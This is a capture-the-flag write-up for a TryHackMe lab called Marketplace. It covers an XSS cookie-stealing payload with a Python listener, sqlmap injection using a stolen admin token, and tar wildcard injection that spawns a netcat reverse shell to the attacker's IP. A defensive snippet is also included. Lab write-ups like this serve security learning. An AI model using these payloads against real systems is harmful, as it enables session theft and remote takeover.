The Marketplace CTF Writeup on TryHackMe

Before all

Coffee or tea or whale?
Well… you can’t order the last one 🤣

Victim IP: 10.10.65.93
My IP: 10.8.211.34

Write Up

RECON

Nothing notable apart from port 32768, which serves the same application as port 80.

Web Exploitation

This is a simple marketplace website: you can register an account and add new items.

XSS

After trying out the add-item function, I noticed an XSS vulnerability: both alerts fired, so it was time to report the listing carrying the payload to the admin.
Although webhook.site isn’t reachable from the lab, a simple HTTP server in Python works just as well for catching the callback.
Source:

#!/usr/bin/env python3
# POC for cookie stealing through XSS
# Should work with:
# <script>
# image = new Image();
# image.src='http://X.X.X.X:8888/?'+document.cookie;
# </script>
#
# Written by Ahmed Shawky @lnxg33k
# (the original targets Python 2; imports and print calls are ported to Python 3 here)

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from datetime import datetime


class MyHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        # Everything after '?' is the exfiltrated document.cookie string,
        # so each cookie shows up as one key=value pair of the query
        query_components = parse_qs(urlparse(self.path).query)
        print("")
        print("%s - %s\t%s" % (
            datetime.now().strftime("%Y-%m-%d %I:%M %p"),
            self.client_address[0],
            self.headers['user-agent']))
        print("-------------------" * 6)
        for k, v in query_components.items():
            print("%s\t\t\t%s" % (k.strip(), v))
        return

    def log_message(self, format, *args):
        # Silence the default per-request access log
        return


if __name__ == "__main__":
    try:
        server = HTTPServer(('0.0.0.0', 8888), MyHandler)
        print('Started http server')
        server.serve_forever()
    except KeyboardInterrupt:
        print('^C received, shutting down server')
        server.socket.close()

XSS Payload:

<script> image = new Image(); image.src='http://10.8.211.34:8888/?'+document.cookie; </script>


SQL Injection

After getting the admin’s cookie, I found a SQL injection in the admin panel.

sqlmap:
sqlmap --url "http://10.10.65.93/admin?user=1" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDA2MjkxMDN9.Lj9L2zuNLSAQE3btbfm_XZTgbJHKRPH7HOWk-fSbgyE' --technique=U --delay=2 --dump

And here’s the SSH password~


Privilege Escalation

Wildcard Injection

More information here: link

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.211.34 5130 >/tmp/f'>shell.sh
echo "">'--checkpoint-action=exec=sh shell.sh'
echo "">--checkpoint=1


Got a shell back on port 5130 and escalated to user michael.
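The defensive counterpart to the tar wildcard injection above, as an added example that is not part of the writeup: a backup helper that refuses option-looking filenames and feeds names to GNU tar through --null/-T so they are never parsed as options. It assumes GNU tar and a find that supports -mindepth/-maxdepth (Linux); the function names and paths are my own.

```shell
#!/bin/sh
# Added example, not from the writeup. A cron job that runs "tar cf backup.tar *"
# lets any filename starting with "-" be parsed as a tar option (the trick used
# above). This helper refuses to archive a directory holding such names and,
# when it does archive, passes names NUL-separated so tar treats them as data.

# Print the top-level names in $1 that look like options (start with "-").
find_option_like_names() {
    ( cd "$1" && find . -mindepth 1 -maxdepth 1 -name '-*' | sed 's|^\./||' )
}

# Archive directory $1 into $2 ($2 should be an absolute path outside $1).
# GNU tar's --null implies --verbatim-files-from, so a leading "-" in a name
# read via -T is a filename, never an option.
safe_backup() {
    dir="$1"
    out="$2"
    bad="$(find_option_like_names "$dir")"
    if [ -n "$bad" ]; then
        printf 'refusing to archive %s: option-like names found:\n%s\n' "$dir" "$bad" >&2
        return 1
    fi
    ( cd "$dir" && find . -mindepth 1 -maxdepth 1 -print0 \
        | tar --null -cf "$out" -T - )
}
```

Running the check from the cron script itself gives you an alert the first time an unexpected "-" name appears in a backed-up directory.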

Docker Escalation

GTFOBins
Get flag!!!

After all

Just a little bit tired and nervous now ><.